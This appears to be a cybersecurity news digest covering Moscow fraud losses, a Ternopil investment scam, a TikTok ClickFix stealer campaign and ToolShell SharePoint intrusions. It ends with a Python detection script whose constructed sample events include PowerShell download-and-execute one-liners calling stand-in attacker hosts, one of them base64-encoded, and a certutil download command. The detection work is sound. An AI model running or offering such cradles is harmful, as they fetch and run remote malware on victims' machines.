Worrisome News from the World of Cybercrime: Billions in Losses, TikTok Fraud, and Vulnerabilities in Systems

We’ve compiled the most significant cybersecurity news from the past week.

In the first half of 2025, cybercrime inflicted damage amounting to 34 billion rubles in Moscow. This information was shared in an interview with Interfax by Colonel Anton Kononenko, head of the Department for Combating the Illegal Use of Information and Communication Technologies of the Russian Ministry of Internal Affairs in the capital.

«Crimes are now being committed in amounts starting from one million rubles, and there are practically no minor cases left. Compared to previous years, the losses caused by cyber fraudsters in the city are on the rise,» Kononenko remarked.

Law enforcement reported that this spring, cyber fraudsters set a record by stealing 450 million rubles.

According to Kononenko, losses have been growing for the past three years. Previously, most theft investigations involved amounts of up to 50,000 rubles, whereas now about 80% of identified crimes fall into the categories of serious (losses of 250,000 rubles or more) and especially serious offenses.

A 64-year-old resident of Ternopil fell victim to fraud, losing around 1 million hryvnias. This was reported by the press service of the Ternopil District Police Department.

As indicated by law enforcement, the victim saw an ad on social media promoting investment courses with promises of earnings. He clicked on the link and contacted someone who claimed to be a broker-analyst.

After registering on the website, the retiree began transferring money to the specified account from his electronic wallet. When the total reached $28,100, the «broker» stopped communicating, and access to the platform was blocked.

On October 17, ISC Handler analyst Xavier Mertens reported an ongoing campaign that uses TikTok videos to deliver malware.

Malware designed for data theft was disguised as free guides to activating popular programs like Windows, Spotify, and Netflix.

The creators of these videos employed ClickFix social engineering techniques, offering victims seemingly legitimate «solutions» or instructions.

In reality, these «instructions» get the viewer to execute malicious PowerShell commands or other scripts that infect the computer.

Each video demonstrates a short one-line command and prompts viewers to run it as an administrator in PowerShell.

Once run, the one-liner connects to a remote site and downloads a second script, which in turn retrieves and installs two executables from Cloudflare Pages. The first is a variant of Aura Stealer, an information stealer.

All collected data is sent to the attackers, giving them access to the victim’s accounts.

Mertens added that a second file, source.exe, is also downloaded. It uses the Visual C# compiler (csc.exe) that ships with the .NET Framework to compile code on the victim’s machine, and the resulting code is executed in memory. The purpose of this second module is not yet known.

Hackers believed to be connected to China exploited the ToolShell vulnerability in Microsoft SharePoint to target government agencies, universities, telecommunications providers, and financial organizations. This was detailed in a report by Symantec.

The vulnerability affects on-premises SharePoint servers and became known in July following widespread attacks by Chinese hackers. It can be exploited remotely without authentication to execute code and gain full access to the file system.

During this campaign, the attackers used malware typically associated with the Chinese hackers known as Salt Typhoon.

According to Symantec, ToolShell was used to compromise organizations in the Middle East, South America, the United States, and Africa.

Notably, the attacks made use of legitimate executable files from Trend Micro and Bitdefender. In the South American intrusion, the attackers used a file whose name mimicked that of a Symantec file.

Researchers noted that the publicly available tools used in the attacks included Microsoft’s certutil, the GoGo scanner, and Revsocks, a reverse SOCKS proxy that lets the attackers tunnel traffic and exfiltrate data through a remote server.
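Both stories above come down to living-off-the-land steps that show up in ordinary process-creation telemetry: in the TikTok ClickFix chain, an elevated PowerShell download cradle followed by csc.exe spawned from PowerShell; in the ToolShell intrusions, certutil used as a downloader and shells launched from the compromised server. The following Python script is an added illustration of how to triage such records, not code from the ISC diary or the Symantec report. The Sysmon Event ID 1-style records, the domains (attacker-site.pages.dev, evil.example), the paths and the IP address are all constructed here, and the assumption that post-exploitation activity on a SharePoint server appears as descendants of the IIS worker process w3wp.exe is mine, not something either report states.

```python
"""Process-creation triage for the two living-off-the-land chains in this digest.

Added illustration, not code from the ISC diary or the Symantec report.
Input is a minimal Sysmon Event ID 1-style record (pid, parent pid, image,
command line, elevation). Every sample event below is constructed."""
import base64
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str             # full image path of the new process
    cmdline: str
    elevated: bool = False  # High/System integrity, i.e. "run as administrator"


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    severity: str


POWERSHELL = {"powershell.exe", "pwsh.exe"}
WEB_WORKER = {"w3wp.exe"}   # IIS worker process; assumed parent of SharePoint post-exploitation
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}

# Download-and-execute cradle in either order: iex (irm ...) or ...DownloadString(...) | iex
_FETCH = r"(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)"
_EXEC = r"(?:iex|invoke-expression)"
CRADLE_RE = re.compile(rf"\b{_EXEC}\b.*\b{_FETCH}\b|\b{_FETCH}\b.*\b{_EXEC}\b", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob
ENC_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# certutil switches that turn it into a downloader or a base64/hex decoder
CERTUTIL_ABUSE_RE = re.compile(r"-(?:urlcache|decode|decodehex|encode)\b", re.IGNORECASE)


def decoded_script(cmdline: str) -> str:
    """Replace an -EncodedCommand payload with its UTF-16LE plaintext so the cradle rule can see it."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        text = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):   # not valid base64 / not UTF-16: leave it alone
        return cmdline
    return cmdline[: m.start(1)] + text + cmdline[m.end(1):]


def basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def ancestors(e, by_pid, limit=8):
    """Parent chain of e, bounded so that PID reuse cannot loop forever."""
    chain, cur = [], by_pid.get(e.ppid)
    while cur is not None and len(chain) < limit:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def triage(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        lineage = ancestors(e, by_pid)
        parent = basename(lineage[0].image) if lineage else ""
        under_web = any(basename(a.image) in WEB_WORKER for a in lineage)
        sev = "high" if e.elevated or under_web else "medium"
        cmd = decoded_script(e.cmdline)
        if name in POWERSHELL and CRADLE_RE.search(cmd):
            findings.append(Finding(e.pid, "powershell_download_cradle", sev))
        if name == "csc.exe" and parent in POWERSHELL:
            findings.append(Finding(e.pid, "csc_spawned_by_powershell", sev))
        if name == "certutil.exe" and CERTUTIL_ABUSE_RE.search(cmd):
            findings.append(Finding(e.pid, "certutil_download_or_decode", sev))
        if parent in WEB_WORKER and name in SHELLS:
            findings.append(Finding(e.pid, "web_worker_spawned_shell", sev))
    return sorted(findings, key=lambda f: f.pid)


# Constructed sample telemetry (not from any real incident).
ENCODED_PAYLOAD = base64.b64encode("iex (irm https://evil.example/a.ps1)".encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # ClickFix chain: elevated one-liner, then csc.exe compiling a dropped source file
    ProcEvent(200, 100, PS, 'powershell -NoP -W Hidden -c "iex (irm https://attacker-site.pages.dev/s.ps1)"', elevated=True),
    ProcEvent(210, 200, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\xq1.cmdline"', elevated=True),
    ProcEvent(220, 100, PS, f"powershell -NoP -enc {ENCODED_PAYLOAD}"),   # same cradle, base64-hidden
    # Assumed post-exploitation under the SharePoint worker: cmd.exe, then certutil as a downloader
    ProcEvent(300, 1, r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap SharePoint"),
    ProcEvent(310, 300, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "certutil -urlcache -split -f http://203.0.113.5/r.txt C:\\ProgramData\\r.exe"'),
    ProcEvent(320, 310, r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f http://203.0.113.5/r.txt C:\ProgramData\r.exe"),
    # Benign uses that must not fire
    ProcEvent(400, 100, PS, "powershell -c Get-Date"),
    ProcEvent(410, 100, r"C:\Windows\System32\certutil.exe", r"certutil -verify C:\temp\cert.cer"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f.pid:<4} {f.severity:<6} {f.rule}")
```

The rules deliberately key on process lineage rather than on the downloaded file names or hosts, since those change between videos and between intrusions: a csc.exe child of PowerShell and a certutil download under w3wp.exe are rare in normal operation regardless of what was fetched. Decoding -EncodedCommand before matching closes the most common evasion of command-line pattern rules; in production, PowerShell script block logging (Event ID 4104) gives the same visibility without decoding.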